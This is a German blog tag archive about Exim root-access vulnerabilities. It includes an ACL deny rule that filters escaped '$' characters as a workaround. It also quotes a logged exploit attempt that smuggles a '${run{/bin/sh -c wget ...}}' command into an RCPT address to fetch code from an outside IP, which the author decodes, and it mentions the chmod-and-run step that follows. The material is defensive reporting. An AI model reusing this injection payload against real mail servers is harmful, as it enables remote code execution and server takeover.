Tag Archives: Exim

Neue Exim Sicherheitslücke – Wieder Root Access

Posted on by

Erst vor kurzem haben sich die Wogen zum letzten Exim Exploit geglättet, da kommt die nächste Hiobsbotschaft vom Exim-Team: CVE-2019-13917 – Root Access für lokale und entfernte Benutzer.

Laut Ankündigung auf der Exim-Mailingliste sind wieder sämtliche halbwegs in Benutzung befindlichen Exim-Versionen betroffen 4.85 -> 4.92.1. In bestimmten, nicht Defaultkonfigurationen soll eine Root-Access-Lücke für lokale und entfernte Angreifer klaffen.

Mehr Details gibt es noch nicht, da erst am 25.7. offizielles Release Date ist. Wenn Ihr mehr wissen wollt, müßt Ihr einen Distro-Maintainer bestechen, oder 3 Tage warten. Sobald es was neues gibt, melde ich mich dazu.

Exim – Rootlücken Workaround nicht 100% dicht

Posted on by

Guten Morgen, wer seinen Exim immer noch nicht auf den neusten Stand bringen konnte, der muß jetzt nochmal ran an die Config :

  deny    message       = Restricted characters in address
          domains       = +local_domains
          local_parts   = ^[.] : ^.*[\$@%!/|] : ^.*x24 : ^.*0.44

denn leider kann man mit \x24 das $ maskieren und dann schlägt der alte Regelsatz nicht an. Ob man das zu einem Hack eskalieren kann, ist leider ungeklärt. Sicher ist, daß die Schutzregel versagt und das ist etwas, was man nicht haben will. Die „0.44“ ist dann gegen eine OKTALversion, statt Hexadezimal (\x24) von der Umgehung.

Follow-Up auf:

Quickfix: Exim <= 4.91 for CVE-2019-10149

Die Möchtegern-Exim-Exploitwelle geht weiter

Posted on by

Ich könnte mich wegwerfen vor Lachen, die Scriptkids attackieren tatsächlich Server, die Exim in der gepatchten Version laufen haben oder gleich gar keinen Exim, sondern Postfix 😀

Kleine Umfrage auf unserem Cluster

Und so sieht die neueste Version u.a. aus :

2019-06-19 16:08:46 H=(service.com) [98.158.184.125] F=<support@service.com> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fX.X.X.X\x22}}@XXX.XXXXXXX.XX>: you have been blacklisted.

Ich übersetze mal :

/bin/sh -c „wget 64.50.180.45/tmp/X.X.X.X“

Randnotiz: Das SANS Institute glaubte doch glatt, daß die „/bin/sht -ct“ ausführen wollten, weil deren Postfix die „\t“ in „t“ umgewandelt hatte 🙂

Das obige kann nur funktioniert, wenn man danach auch noch chmod u+x /tmp/X.X.X.X;/tmp/X.X.X.X ausführt und wenn der Server auch mal was ausliefern würde, außer der 404 Seite .. aka… Hack schon gefunden und beseitigt 😉  Naja, die hatten ja auch zwei Tage Zeit 😉